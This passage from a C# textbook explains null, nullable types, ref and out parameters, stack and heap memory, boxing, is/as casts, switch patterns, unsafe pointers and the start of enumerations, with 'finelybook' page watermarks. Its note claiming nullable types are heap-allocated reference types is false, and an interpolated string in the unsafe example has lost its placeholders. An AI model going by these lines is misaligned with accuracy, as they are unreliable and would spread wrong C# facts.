object, like this:
Circle c = new Circle(42);
This is all very well, but what if you don’t actually want to create a new
object? Perhaps the purpose of the variable is simply to store a reference to an
existing object at some later point in your program. In the following code
example, the Circle variable copy is initialized, but later it is assigned a
reference to another instance of the Circle class:
Click here to view code image
Circle c = new Circle(42);
Circle copy = new Circle(99); // Some random value, for initializing
copy
...
copy = c; // copy and c refer to the same object
After assigning c to copy, what happens to the original Circle object with
a radius of 99 that you used to initialize copy? Nothing refers to it anymore.
In this situation, the runtime can reclaim the memory by performing an
operation known as garbage collection, which you will learn more about in
Chapter 14, “Using garbage collection and resource management.” The
important thing to understand for now is that garbage collection is a
potentially time-consuming operation; you should not create objects that are
never used because doing so is a waste of time and resources.
You could argue that if a variable is going to be assigned a reference to
another object at some point in a program, there is no point to initializing it.
But this is poor programming practice, which can lead to problems in your
code. For example, you will inevitably find yourself in the situation in which
you want to refer a variable to an object only if that variable does not already
Download from finelybook [email protected]
305
contain a reference, as shown in the following code example:
Click here to view code image
Circle c = new Circle(42);
Circle copy; // Uninitialized !!!
...
if (copy == // only assign to copy if it is uninitialized, but what
goes here?)
{
copy = c; ; // copy and c refer to the same object
...
}
The purpose of the if statement is to test the copy variable to see whether it
is initialized, but to which value should you compare this variable? The
answer is to use a special value called null.
In C#, you can assign the null value to any reference variable. The null
value simply means that the variable does not refer to an object in memory.
You can use it like this:
Click here to view code image
Circle c = new Circle(42);
Circle copy = null; // Initialized
...
if (copy == null)
{
copy = c; // copy and c refer to the same object
...
}
The null-conditional operator
The null-conditional operator enables you to test for null values very
succinctly. To use the null-conditional operator, you append a question mark
(?) to the name of your variable.
For example, suppose you attempt to call the Area method on a Circle
object when the Circle object has a null value:
Click here to view code image
Circle c = null;
Console.WriteLine($"The area of circle c is {c.Area()}");
Download from finelybook [email protected]
306
In this case, the Circle.Area method throws a NullReferenceException,
which makes sense because you cannot calculate the area of a circle that does
not exist.
To avoid this exception, you could test whether the Circle object is null
before you attempt to call the Circle.Area method:
Click here to view code image
if (c != null)
{
Console.WriteLine($"The area of circle c is {c.Area()}");
}
In this case, if c is null, nothing is written to the command window.
Alternatively, you could use the null-conditional operator on the Circle object
before you attempt to call the Circle.Area method:
Click here to view code image
Console.WriteLine($"The area of circle c is {c?.Area()}");
The null-conditional operator tells the C# runtime to ignore the current
statement if the variable to which you have applied the operator is null. In
this case, the command window would display the following text:
The area of circle c is
Both approaches are valid and might meet your needs in different
scenarios. The null-conditional operator can help you keep your code
concise, particularly when you deal with complex properties with nested
reference types that could all be null valued.
Using nullable types
The null value is very useful for initializing reference types. Sometimes, you
need an equivalent value for value types, but null is itself a reference, so you
cannot assign it to a value type. The following statement is therefore illegal in
C#:
int i = null; // illegal
However, C# defines a modifier that you can use to declare that a variable
is a nullable value type. A nullable value type behaves similarly to the
Download from finelybook [email protected]
307
original value type, but you can assign the null value to it. You use the
question mark (?) to indicate that a value type is nullable, like this:
int? i = null; // legal
You can ascertain whether a nullable variable contains null by testing it in
the same way as you test a reference type.
Click here to view code image
if (i == null)
...
You can assign an expression of the appropriate value type directly to a
nullable variable. The following examples are all legal:
Click here to view code image
int? i = null;
int j = 99;
i = 100; // Copy a value type constant to a nullable type
i = j; // Copy a value type variable to a nullable type
You should note that the converse is not true. You cannot assign a
nullable variable to an ordinary value type variable. So, given the definitions
of variables i and j from the preceding example, the following statement is
not allowed:
j = i; // Illegal
This makes sense when you consider that the variable i might contain null,
and j is a value type that cannot contain null. This also means that you cannot
use a nullable variable as a parameter to a method that expects an ordinary
value type. If you recall, the Pass.Value method from the preceding exercise
expects an ordinary int parameter, so the following method call will not
compile:
Click here to view code image
int? i = 99;
Pass.Value(i); // Compiler error
Note Take care not to confuse nullable types with the null-conditional
Download from finelybook [email protected]
308
operator. Nullable types are indicated by appending a question mark to
the type name, whereas the null-conditional operator is appended to the
variable name.
Understanding the properties of nullable types
A nullable type exposes a pair of properties that you can use to determine
whether the type actually has a nonnull value and what this value is. The
HasValue property indicates whether a nullable type contains a value or is
null. You can retrieve the value of a nonnull nullable type by reading the
Value property, like this:
Click here to view code image
int? i = null;
...
if (!i.HasValue)
{
// If i is null, then assign it the value 99
i = 99;
}
else
{
// If i is not null, then display its value
Console.WriteLine(i.Value);
}
In Chapter 4, “Using decision statements,” you saw that the NOT operator
(!) negates a Boolean value. The code fragment above tests the nullable
variable i, and if it does not have a value (it is null), it assigns it the value 99;
otherwise, it displays the value of the variable. In this example, using the
HasValue property does not provide any benefit over testing for a null value
directly. Additionally, reading the Value property is a long-winded way of
reading the contents of the variable. However, these apparent shortcomings
are caused by the fact that int? is a very simple nullable type. You can create
more complex value types and use them to declare nullable variables where
the advantages of using the HasValue and Value properties become more
apparent. You will see some examples in Chapter 9, “Creating value types
with enumerations and structures.”
Download from finelybook [email protected]
309
Note The Value property of a nullable type is read-only. You can use
this property to read the value of a variable but not to modify it. To
update a nullable variable, use an ordinary assignment statement.
Using ref and out parameters
Ordinarily, when you pass an argument to a method, the corresponding
parameter is initialized with a copy of the argument. This is true regardless of
whether the parameter is a value type (such as an int), a nullable type (such as
int?), or a reference type (such as a WrappedInt). This arrangement means
that it’s impossible for any change to the parameter to affect the value of the
argument passed in. For example, in the following code, the value output to
the console is 42, not 43. The doIncrement method increments a copy of the
argument (arg) and not the original argument, as demonstrated here:
Click here to view code image
static void doIncrement(int param)
{
param++;
}
static void Main()
{
int arg = 42;
doIncrement(arg);
Console.WriteLine(arg); // writes 42, not 43
}
In the preceding exercise, you saw that if the parameter to a method is a
reference type, any changes made by using that parameter change the data
referenced by the argument passed in. The key point is this: Although the
data that was referenced changed, the argument passed in as the parameter
did not—it still references the same object. In other words, although it is
possible to modify the object that the argument refers to through the
parameter, it’s not possible to modify the argument itself (for example, to set
it to refer to a completely different object). Most of the time, this guarantee is
Download from finelybook [email protected]
310
very useful and can help to reduce the number of bugs in a program.
Occasionally, however, you might want to write a method that actually needs
to modify an argument. C# provides the ref and out keywords so that you can
do this.
Creating ref parameters
If you prefix a parameter with the ref keyword, the C# compiler generates
code that passes a reference to the actual argument rather than a copy of the
argument. When using a ref parameter, anything you do to the parameter you
also do to the original argument because the parameter and the argument both
reference the same data. When you pass an argument as a ref parameter, you
must also prefix the argument with the ref keyword. This syntax provides a
useful visual cue to the programmer that the argument might change. Here’s
the preceding example again, this time modified to use the ref keyword:
Click here to view code image
static void doIncrement(ref int param) // using ref
{
param++;
}
static void Main()
{
int arg = 42;
doIncrement(ref arg); // using ref
Console.WriteLine(arg); // writes 43
}
This time, the doIncrement method receives a reference to the original
argument rather than a copy, so any changes the method makes by using this
reference actually change the original value. That’s why the value 43 is
displayed on the console.
Remember that C# enforces the rule that you must assign a value to a
variable before you can read it. This rule also applies to method arguments;
you cannot pass an uninitialized value as an argument to a method even if an
argument is defined as a ref argument. For example, in the following
example, arg is not initialized, so this code will not compile. This failure
occurs because the statement param++; within the doIncrement method is
really an alias for the statement arg++;—and this operation is allowed only if
arg has a defined value:
Download from finelybook [email protected]
311
Click here to view code image
static void doIncrement(ref int param)
{
param++;
}
static void Main()
{
int arg; // not initialized
doIncrement(ref arg);
Console.WriteLine(arg);
}
Creating out parameters
The compiler checks whether a ref parameter has been assigned a value
before calling the method. However, there might be times when you want the
method itself to initialize the parameter. You can do this with the out
keyword.
The out keyword is syntactically similar to the ref keyword. You can
prefix a parameter with the out keyword so that the parameter becomes an
alias for the argument. As when using ref, anything you do to the parameter,
you also do to the original argument. When you pass an argument to an out
parameter, you must also prefix the argument with the out keyword.
The keyword out is short for output. When you pass an out parameter to a
method, the method must assign a value to it before it finishes or returns, as
shown in the following example:
Click here to view code image
static void doInitialize(out int param)
{
param = 42; // Initialize param before finishing
}
The following example does not compile because doInitialize does not
assign a value to param:
Click here to view code image
static void doInitialize(out int param)
{
// Do nothing
}
Download from finelybook [email protected]
312
Because an out parameter must be assigned a value by the method, you’re
allowed to call the method without initializing its argument. For example, the
following code calls doInitialize to initialize the variable arg, which is then
displayed on the console:
Click here to view code image
static void doInitialize(out int param)
{
param = 42;
}
static void Main()
{
int arg; // not initialized
doInitialize(out arg); // legal
Console.WriteLine(arg); // writes 42
}
Note You can combine the declaration of an out variable with its use as
a parameter rather than performing these tasks separately. For example,
you could replace the first two statements in the Main method in the
previous example with the single line of code:
doInitialize(out int arg);
In the next exercise, you will practice using ref parameters.
Use ref parameters
1. Return to the Parameters project in Visual Studio 2017.
2. Display the Pass.cs file in the Code and Text Editor window.
3. Edit the Value method to accept its parameter as a ref parameter.
The Value method should look like this:
Click here to view code image
class Pass
{
Download from finelybook [email protected]
313
public static void Value(ref int param)
{
param = 42;
}
...
}
4. Display the Program.cs file in the Code and Text Editor window.
5. Uncomment the first four statements. Notice that the third statement of
the doWork method, Pass.Value(i), indicates an error. The error occurs
because the Value method now expects a ref parameter. Edit this
statement so that the Pass.Value method call passes its argument as a ref
parameter.
Note Leave the four statements that create and test the WrappedInt
object as they are.
The doWork method should now look like this:
Click here to view code image
class Program
{
static void doWork()
{
int i = 0;
Console.WriteLine(i);
Pass.Value(ref i);
Console.WriteLine(i);
...
}
}
6. On the Debug menu, click Start Without Debugging to build and run the
program.
This time, the first two values written to the console window are 0 and
42. This result shows that the call to the Pass.Value method has
successfully modified the argument i.
Download from finelybook [email protected]
314
7. Press the Enter key to close the application and return to Visual Studio
2017.
Note You can use the ref and out modifiers on reference type
parameters as well as on value type parameters. The effect is the same:
the parameter becomes an alias for the argument.
How computer memory is organized
Computers use memory to hold programs that are being executed and the
data that those programs use. To understand the differences between value
and reference types, it is helpful to understand how data is organized in
memory.
Operating systems and language runtimes such as that used by C#
frequently divide the memory used for holding data into two separate areas,
each of which is managed in a distinct manner. These two areas of memory
are traditionally called the stack and the heap. The stack and the heap serve
different purposes, which are described here:
When you call a method, the memory required for its parameters and
its local variables is always acquired from the stack. When the method
finishes (because it either returns or throws an exception), the memory
acquired for the parameters and local variables is automatically
released back to the stack and is available again when another method
is called. Method parameters and local variables on the stack have a
well-defined lifespan: they come into existence when the method starts,
and they disappear as soon as the method completes.
Note Actually, the same lifespan applies to variables defined in
Download from finelybook [email protected]
315
any block of code enclosed by opening and closing curly braces. In
the following code example, the variable i is created when the
body of the while loop starts, but it disappears when the while loop
finishes and execution continues after the closing brace:
Click here to view code image
while (...)
{
int i = …; // i is created on the stack here
...
}
// i disappears from the stack here
When you create an object (an instance of a class) by using the new
keyword, the memory required to build the object is always acquired
from the heap. You have seen that the same object can be referenced
from several places by using reference variables. When the last
reference to an object disappears, the memory used by the object
becomes available again (although it might not be reclaimed
immediately). Chapter 14 includes a more detailed discussion of how
heap memory is reclaimed. Objects created on the heap therefore have
a more indeterminate lifespan; an object is created by using the new
keyword, but it disappears only sometime after the last reference to the
object is removed.
Note All value types are created on the stack. All reference types
(objects) are created on the heap (although the reference itself is on
the stack). Nullable types are actually reference types, and they are
created on the heap.
The names stack and heap come from the way in which the runtime
manages the memory:
Stack memory is organized like a stack of boxes piled on top of one
Download from finelybook [email protected]
316
another. When a method is called, each parameter is placed in a box
that is placed on top of the stack. Each local variable is likewise
assigned a box, and these are placed on top of the boxes already on the
stack. When a method finishes, you can think of the boxes being
removed from the stack.
Heap memory is like a large pile of boxes strewn around a room rather
than stacked neatly on top of one another. Each box has a label
indicating whether it is in use. When a new object is created, the
runtime searches for an empty box and allocates it to the object. The
reference to the object is stored in a local variable on the stack. The
runtime keeps track of the number of references to each box.
(Remember that two variables can refer to the same object.) When the
last reference disappears, the runtime marks the box as not in use, and
at some point in the future it will empty the box and make it available.
Using the stack and the heap
Now let’s examine what happens when a method named Method is called:
Click here to view code image
void Method(int param)
{
Circle c;
c = new Circle(param);
...
}
Suppose the argument passed into param is the value 42. When the
method is called, a block of memory (just enough for an int) is allocated from
the stack and initialized with the value 42. As execution moves inside the
method, another block of memory big enough to hold a reference (a memory
address) is also allocated from the stack but left uninitialized. This is for the
Circle variable, c. Next, another piece of memory big enough for a Circle
object is allocated from the heap. This is what the new keyword does. The
Circle constructor runs to convert this raw heap memory to a Circle object. A
reference to this Circle object is stored in the variable c. The following
illustration shows the situation:
Download from finelybook [email protected]
317
At this point, you should note two things:
Although the object is stored on the heap, the reference to the object
(the variable c) is stored on the stack.
Heap memory is not infinite. If heap memory is exhausted, the new
operator will throw an OutOfMemoryException exception, and the
object will not be created.
Note The Circle constructor could also throw an exception. If it does,
the memory allocated to the Circle object will be reclaimed, and the
value returned by the constructor will be null.
When the method ends, the parameters and local variables go out of
scope. The memory acquired for c and param is automatically released back
to the stack. The runtime notes that the Circle object is no longer referenced
and at some point in the future will arrange for its memory to be reclaimed by
the heap. (See Chapter 14.)
The System.Object class
One of the most important reference types in the .NET Framework is the
Object class in the System namespace. To fully appreciate the significance of
the System.Object class, you need to understand inheritance, which is
described in Chapter 12, “Working with inheritance.” For the time being,
Download from finelybook [email protected]
318
simply accept that all classes are specialized types of System.Object and that
you can use System.Object to create a variable that can refer to any reference
type. System.Object is such an important class that C# provides the object
keyword as an alias for System.Object. In your code, you can use object, or
you can write System.Object—they mean the same thing.
Tip Use the object keyword in preference to System.Object. It’s more
direct, and it’s consistent with other keywords that are synonyms for
classes (such as string for System.String and some others that are
covered in Chapter 9).
In the following example, the variables c and o both refer to the same
Circle object. The fact that the type of c is Circle and the type of o is object
(the alias for System.Object) in effect provides two different views of the
same item in memory.
Click here to view code image
Circle c;
c = new Circle(42);
object o;
o = c;
The following diagram illustrates how the variables c and o refer to the
same item on the heap.
Boxing
Download from finelybook [email protected]
319
As you have just seen, variables of type object can refer to any item of any
reference type. However, variables of type object can also refer to a value
type. For example, the following two statements initialize the variable i (of
type int, a value type) to 42 and then initialize the variable o (of type object, a
reference type) to i:
Click here to view code image
int i = 42;
object o = i;
The second statement requires a little explanation to appreciate what is
actually happening. Remember that i is a value type and that it lives on the
stack. If the reference inside o referred directly to i, the reference would refer
to the stack. However, all references must refer to objects on the heap;
creating references to items on the stack could seriously compromise the
robustness of the runtime and create a potential security flaw, so it is not
allowed. Therefore, the runtime allocates a piece of memory from the heap,
copies the value of integer i to this piece of memory, and then refers the
object o to this copy. This automatic copying of an item from the stack to the
heap is called boxing. The following diagram shows the result:
Important If you modify the original value of the variable i, the value
on the heap referenced through o will not change. Likewise, if you
modify the value on the heap, the original value of the variable will not
change.
Download from finelybook [email protected]
320
Unboxing
Because a variable of type object can refer to a boxed copy of a value, it’s
only reasonable to allow you to get at that boxed value through the variable.
You might expect to be able to access the boxed int value that a variable o
refers to by using a simple assignment statement such as this:
int i = o;
However, if you try this syntax, you’ll get a compile-time error. If you
think about it, it’s pretty sensible that you can’t use the int i = o; syntax.
After all, o could be referencing absolutely anything and not just an int.
Consider what would happen in the following code if this statement were
allowed:
Click here to view code image
Circle c = new Circle();
int i = 42;
object o;
o = c; // o refers to a circle
i = o; // what is stored in i?
To obtain the value of the boxed copy, you must use what is known as a
cast. This is an operation that checks whether converting an item of one type
to another is safe before actually making the copy. You prefix the object
variable with the name of the type in parentheses, as in this example:
Click here to view code image
int i = 42;
object o = i; // boxes
i = (int)o; // compiles okay
The effect of this cast is subtle. The compiler notices that you’ve specified
the type int in the cast. Next, the compiler generates code to check what o
actually refers to at runtime. It could be absolutely anything. Just because
your cast says o refers to an int, that doesn’t mean it actually does. If o really
does refer to a boxed int and everything matches, the cast succeeds, and the
compiler-generated code extracts the value from the boxed int and copies it to
i. (In this example, the boxed value is then stored in i.) This is called
unboxing. The following diagram shows what is happening:
Download from finelybook [email protected]
321
On the other hand, if o does not refer to a boxed int, there is a type
mismatch, causing the cast to fail. The compiler-generated code throws an
InvalidCastException exception at runtime. Here’s an example of an
unboxing cast that fails:
Click here to view code image
Circle c = new Circle(42);
object o = c; // doesn't box because Circle is a reference variable
int i = (int)o; // compiles okay but throws an exception at runtime
The following diagram illustrates this case:
You will use boxing and unboxing in later exercises. Keep in mind that
boxing and unboxing are expensive operations because of the amount of
checking required and the need to allocate additional heap memory. Boxing
has its uses, but injudicious use can severely impair the performance of a
program. You will see an alternative to boxing in Chapter 17, “Introducing
generics.”
Casting data safely
Download from finelybook [email protected]
322
By using a cast, you can specify that, in your opinion, the data referenced by
an object has a specific type and that it is safe to reference the object by using
that type. The key phrase here is “in your opinion.” The C# compiler will not
check that this is the case, but the runtime will. If the type of object in
memory does not match the cast, the runtime will throw an
InvalidCastException, as described in the preceding section. You should be
prepared to catch this exception and handle it appropriately if it occurs.
However, catching an exception and attempting to recover if the type of
an object is not what you expected it to be is a rather cumbersome approach.
C# provides two more very useful operators that can help you perform
casting in a much more elegant manner: the is and as operators.
The is operator
You can use the is operator to verify that the type of an object is what you
expect it to be, like this:
Click here to view code image
WrappedInt wi = new WrappedInt();
...
object o = wi;
if (o is WrappedInt)
{
WrappedInt temp = (WrappedInt)o; // This is safe; o is a
WrappedInt
...
}
The is operator takes two operands: a reference to an object on the left,
and the name of a type on the right. If the type of the object referenced on the
heap has the specified type, is evaluates to true; otherwise, is evaluates to
false. The preceding code attempts to cast the reference to the object variable
o only if it knows that the cast will succeed.
Another form of the is operator enables you to abbreviate this code by
combining the type check and the assignment, like this:
Click here to view code image
WrappedInt wi = new WrappedInt();
...
object o = wi;
Download from finelybook [email protected]
323
...
if (o is WrappedInt temp)
{
... // Use temp here
}
In this example, if the test for the WrappedInt type is successful, the is
operator creates a new reference variable (called temp), and assigns it a
reference to the WrappedInt object.
The as operator
The as operator fulfills a similar role to is but in a slightly truncated manner.
You use the as operator like this:
Click here to view code image
WrappedInt wi = new WrappedInt();
...
object o = wi;
WrappedInt temp = o as WrappedInt;
if (temp != null)
{
... // Cast was successful
}
Like the is operator, the as operator takes an object and a type as its
operands. The runtime attempts to cast the object to the specified type. If the
cast is successful, the result is returned and, in this example, is assigned to the
WrappedInt variable temp. If the cast is unsuccessful, the as operator
evaluates to the null value and assigns that to temp instead.
There is a little more to the is and as operators than is described here, and
Chapter 12 discusses them in greater detail.
The switch statement revisited
If you need to check a reference against several types, you can use a series of
if…else statements in conjunction with the is operator. The following
example assumes that you have defined the Circle, Square, and Triangle
classes. The constructors take the radius, or side length of the geometric
shape as the parameter:
Click here to view code image
Download from finelybook [email protected]
324
Circle c = new Circle(42); // Circle of radius 42
Square s = new Square(55); // Square of side 55
Triangle t = new Triangle(33); // Equilateral triangle of side 33
...
object o = s;
...
if (o is Circle myCircle)
{
... // o is a Circle, a reference is available in myCircle
}
else if (o is Square mySquare)
{
... // o is a Square, a reference is available in mySquare
}
else if (o is Triangle myTriangle)
{
... // o is a Triangle, a reference is available in myTriangle
}
As with any lengthy set of if…else statements, this approach can quickly
become cumbersome and difficult to read. Fortunately, you can use the
switch statement in this situation, as follows:
Click here to view code image
switch (o)
{
case Circle myCircle:
... // o is a Circle, a reference is available in myCircle
break;
case Square mySquare:
... // o is a Square, a reference is available in mySquare
break;
case Triangle myTriangle:
... // o is a Triangle, a reference is available in
myTriangle
break;
default:
throw new ArgumentException("variable is not a recognized
shape");
break;
}
Note that, in both examples (using the is operator and the switch
statement), the scope of the variables created (myCircle, mySquare, and
myTriangle) are limited to the code inside the corresponding if block or case
Download from finelybook [email protected]
325
block.
Note Case selectors in switch statements also support when expressions,
which you can use to further qualify the situation under which the case
is selected. For example, the following switch statement shows case
selectors that match different sizes of geometric shapes:
Click here to view code image
switch (o)
{
case Circle myCircle when myCircle.Radius > 10:
...
break;
case Square mySquare when mySquare.SideLength == 100:
...
break;
...
}
Pointers and unsafe code
This section is purely for your information and is aimed at developers
who are familiar with C or C++. If you are new to programming, feel
free to skip this section.
If you have already written programs in languages such as C or C++,
much of the discussion in this chapter concerning object references
might be familiar in that both languages have a construct that provides
similar functionality: a pointer.
A pointer is a variable that holds the address of, or a reference to, an
item in memory (on the heap or the stack). A special syntax is used to
identify a variable as a pointer. For example, the following statement
declares the variable pi as a pointer to an integer:
Download from finelybook [email protected]
326
int *pi;
Although the variable pi is declared as a pointer, it does not actually
point anywhere until you initialize it. For example, to use pi to point to
the integer variable i, you can use the following statements and the
address-of operator (&), which returns the address of a variable:
Click here to view code image
int *pi;
int i = 99;
...
pi = &i;
You can access and modify the value held in the variable i through
the pointer variable pi like this:
*pi = 100;
This code updates the value of the variable i to 100 because pi points
to the same memory location as the variable i.
One of the main problems that developers learning C and C++
encounter is understanding the syntax used by pointers. The * operator
has at least two meanings (in addition to being the arithmetic
multiplication operator), and there is often great confusion about when
to use & rather than *. The other issue with pointers is that it is easy to
point somewhere invalid or to forget to point somewhere at all, and then
try to reference the data pointed to. The result will be either garbage or
a program that fails with an error because the operating system detects
an attempt to access an illegal address in memory. There is also a whole
range of security flaws in many existing systems resulting from the
mismanagement of pointers; some environments (not Windows) fail to
enforce checks that a pointer does not refer to memory that belongs to
another process, opening up the possibility that confidential data could
be compromised.
Reference variables were added to C# to avoid all these problems. If
you really want to, you can continue to use pointers in C#, but you must
mark the code as unsafe. The unsafe keyword can be used to mark a
block of code or an entire method, as shown here:
Click here to view code image
Download from finelybook [email protected]
327
public static void Main(string [] args)
{
int x = 99, y = 100;
unsafe
{
swap (&x, &y);
}
Console.WriteLine($"x is now , y is now ");
}
public static unsafe void swap(int *a, int *b)
{
int temp;
temp = *a;
*a = *b;
*b = temp;
}
When you compile programs containing unsafe code, you must
specify the Allow Unsafe Code option when building the project. To do
this, right-click the project in Solution Explorer and then click
Properties. In the Properties window, click the Build tab, select Allow
Unsafe Code, and then, on the File menu, click Save All.
Unsafe code also has a bearing on how memory is managed. Objects
created in unsafe code are said to be unmanaged. Although situations
that require you to access memory in this way are not common, you
might encounter some, especially if you are writing code that needs to
perform some low-level Windows operations.
You will learn about the implications of using code that accesses
unmanaged memory in more detail in Chapter 14.
Summary
In this chapter, you learned about some important differences between value
types that hold their value directly on the stack and reference types that refer
indirectly to their objects on the heap. You also learned how to use the ref
and out keywords on method parameters to gain access to the arguments. You
saw how assigning a value (such as the int 42) to a variable of the
System.Object class creates a boxed copy of the value on the heap and then
causes the System.Object variable to refer to this boxed copy. You also saw
Download from finelybook [email protected]
328
how assigning a variable of a value type (such as an int) from a variable of
the System.Object class copies (or unboxes) the value in the System.Object
class to the memory used by the int.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 9.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Copy a
value type
variable
Simply make the copy. Because the variable is a value type,
you will have two copies of the same value. For example:
Click here to view code image
int i = 42;
int copyi = i;
Copy a
reference
type
variable
Simply make the copy. Because the variable is a reference
type, you will have two references to the same object. For
example:
Click here to view code image
Circle c = new Circle(42);
Circle refc = c;
Declare a
variable that
can hold a
value type
or the null
value
Declare the variable by using the ? modifier with the type.
For example:
int? i = null;
Pass an
argument to
a ref
parameter
Prefix the argument with the ref keyword. This makes the
parameter an alias for the actual argument rather than a copy
of the argument. The method may change the value of the
parameter, and this change is made to the actual argument
rather than to a local copy. For example:
Download from finelybook [email protected]
329
Click here to view code image
static void Main()
{
int arg = 42;
doWork(ref arg);
Console.WriteLine(arg);
}
Pass an
argument to
an out
parameter
Prefix the argument with the out keyword. This makes the
parameter an alias for the actual argument rather than a copy
of the argument. The method must assign a value to the
parameter, and this value is made to the actual argument. For
example:
Click here to view code image
static void Main()
{
int arg;
doWork(out arg);
Console.WriteLine(arg);
}
Box a value
Initialize or assign a variable of type object with the value.
For example:
object o = 42;
Unbox a
value
Cast the object reference that refers to the boxed value to the
type of the value variable. For example:
int i = (int)o;
Cast an
object safely
Use the is operator to test whether the cast is valid. For
example:
Click here to view code image
WrappedInt wi = new WrappedInt();
...
object o = wi;
if (o is WrappedInt temp)
{
...
}
Alternatively, use the as operator to perform the cast, and test
Download from finelybook [email protected]
330
whether the result is null. For example:
Click here to view code image
WrappedInt wi = new WrappedInt();
...
object o = wi;
WrappedInt temp = o as WrappedInt;
if (temp != null)
...
Download from finelybook [email protected]
331
CHAPTER 9
Creating value types with
enumerations and structures
After completing this chapter, you will be able to:
Declare an enumeration type.
Create and use an enumeration type.
Declare a structure type.
Create and use a structure type.
Explain the differences in behavior between a structure and a class.
Chapter 8, “Understanding values and references,” covers the two
fundamental types that exist in Microsoft Visual C#: value types and
reference types. Recall that a value type variable holds its value directly on
the stack, whereas a reference type variable holds a reference to an object on
the heap. Chapter 7, “Creating and managing classes and objects,”
demonstrates how to create your own reference types by defining classes. In
this chapter, you’ll learn how to create your own value types.
C# supports two kinds of value types: enumerations and structures. We’ll
look at each of them in turn.
Working with enumerations
Suppose that you want to represent the seasons of the year in a program. You
Download from finelybook [email protected]
332
could use the integers 0, 1, 2, and 3 to represent spring, summer, fall, and
winter, respectively. This system would work, but it’s not very intuitive. If
you used the integer value 0 in code, it wouldn’t be obvious that a particular
0 represented spring. It also wouldn’t be a very robust solution. For example,
if you declare an int variable named season, there is nothing to stop you from
assigning it any legal integer value outside the set 0, 1, 2, or 3. C# offers a
better solution. You can create an enumeration (sometimes called an enum
type) whose values are limited to a set of symbolic names.
Declaring an enumeration
You define an enumeration by using the enum keyword, followed by a set of
symbols identifying the legal values that the type can have, enclosing them
between braces. Here’s how to declare an enumeration named Season whose
literal values are limited to the symbolic names Spring, Summer, Fall, and
Winter:
Click here to view code image
enum Season { Spring, Summer, Fall, Winter }
Using an enumeration
After you have declared an enumeration, you can use it in the same way you
do any other type. If the name of your enumeration is Season, you can create
variables of type Season, fields of type Season, and parameters of type
Season, as shown in this example:
Click here to view code image
enum Season { Spring, Summer, Fall, Winter }
class Example
{
public void Method(Season parameter) // method parameter example
{
Season localVariable; // local variable example
...
}
private Season currentSeason; // field example
}
Before you can read the value of an enumeration variable, it must be
Download from finelybook [email protected]
333
assigned a value. You can assign a value that is defined by the enumeration
only to an enumeration variable, as is illustrated here:
Click here to view code image
Season colorful = Season.Fall;
Console.WriteLine(colorful); // writes out 'Fall'
Note As you can with all value types, you can create a nullable version
of an enumeration variable by using the ? modifier. You can then assign
the null value, as well as the values defined by the enumeration, to the
variable:
Season? colorful = null;
Notice that you have to write Season.Fall rather than just Fall. All
enumeration literal names are scoped by their enumeration type, which makes
it possible for different enumerations to contain literals with the same name.
Also, notice that when you display an enumeration variable by using
Console.WriteLine, the compiler generates code that writes out the name of
the literal whose value matches the value of the variable. If needed, you can
explicitly convert an enumeration variable to a string that represents its
current value by using the built-in ToString method that all enumerations
automatically contain, as demonstrated in the following example:
Click here to view code image
string name = colorful.ToString();
Console.WriteLine(name); // also writes out 'Fall'
Many of the standard operators that you can use on integer variables you
can also use on enumeration variables (except the bitwise and shift operators,
which are covered in Chapter 16, “Handling binary data and using indexers”).
For example, you can compare two enumeration variables of the same type
for equality by using the equality operator (==), and you can even perform
arithmetic on an enumeration variable—although the result might not always
be meaningful!
Download from finelybook [email protected]
334
Choosing enumeration literal values
Internally, an enumeration type associates an integer value with each element
of the enumeration. By default, the numbering starts at 0 for the first element
and goes up in steps of 1. It’s possible to retrieve the underlying integer value
of an enumeration variable. To do this, you must cast it to its underlying type.
The discussion in Chapter 8 on unboxing instructs that casting a type
converts the data from one type to another as long as the conversion is valid
and meaningful. The following code example writes out the value 2 and not
the word Fall (remember, in the Season enumeration, Spring is 0, Summer
1, Fall 2, and Winter 3):
Click here to view code image
enum Season { Spring, Summer, Fall, Winter }
...
Season colorful = Season.Fall;
Console.WriteLine((int)colorful); // writes out '2'
If you prefer, you can associate a specific integer constant (such as 1) with
an enumeration literal (such as Spring), as in the following example:
Click here to view code image
enum Season { Spring = 1, Summer, Fall, Winter }
Important The integer value with which you initialize an enumeration
literal must be a compile-time constant value (such as 1).
If you don’t explicitly give an enumeration literal a constant integer value,
the compiler gives it a value that is one greater than the value of the previous
enumeration literal, except for the very first enumeration literal, to which the
compiler gives the default value 0. In the preceding example, the underlying
values of Spring, Summer, Fall, and Winter are now 1, 2, 3, and 4.
You are allowed to give more than one enumeration literal the same
underlying value. For example, in the United Kingdom, fall is referred to as
autumn. You can cater to both cultures as follows:
Download from finelybook [email protected]
335
Click here to view code image
enum Season { Spring, Summer, Fall, Autumn = Fall, Winter }
Choosing an enumeration’s underlying type
When you declare an enumeration, the enumeration literals are given values
of type int. You can also choose to base your enumeration on a different
underlying integer type. For example, to declare that the underlying type for
Season is a short rather than an int, you can write this:
Click here to view code image
enum Season : short { Spring, Summer, Fall, Winter }
The main reason for using short is to save memory; an int occupies more
memory than a short, and if you do not need the entire range of values
available to an int, using a smaller data type can make sense.
You can base an enumeration on any of the eight integer types: byte,
sbyte, short, ushort, int, uint, long, or ulong. The values of all the
enumeration literals must fit within the range of the chosen base type. For
example, if you base an enumeration on the byte data type, you can have a
maximum of 256 literals (starting at 0).
Now that you know how to declare an enumeration, the next step is to use
it. In the following exercise, you will work with a console application to
declare and use an enumeration that represents the months of the year.
Create and use an enumeration
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the StructsAndEnums solution, which is located in the \Microsoft
Press\VCSBS\Chapter 9\StructsAndEnums folder in your Documents
folder.
3. In the Code and Text Editor window, display the Month.cs file.
The source file is empty apart from the declaration of a namespace
called StructsAndEnums and a // TODO: comment.
4. Replace the // TODO: comment with the enumeration named Month
Download from finelybook [email protected]
336
within the StructsAndEnums namespace, as shown in bold in the code
that follows. This enumeration models the months of the year. The 12
enumeration literals for Month are January through December.
Click here to view code image
namespace StructsAndEnums
{
enum Month
{
January, February, March, April,
May, June, July, August,
September, October, November, December
}
}
5. Display the Program.cs file in the Code and Text Editor window.
As in the exercises in previous chapters, the Main method calls the
doWork method and traps any exceptions that occur.
6. In the Code and Text Editor window, add a statement to the doWork
method to declare a variable named first of type Month and initialize it
to Month.January. Add another statement to write the value of the first
variable to the console.
The doWork method should look like this:
Click here to view code image
static void doWork()
{
Month first = Month.January;
Console.WriteLine(first);
}
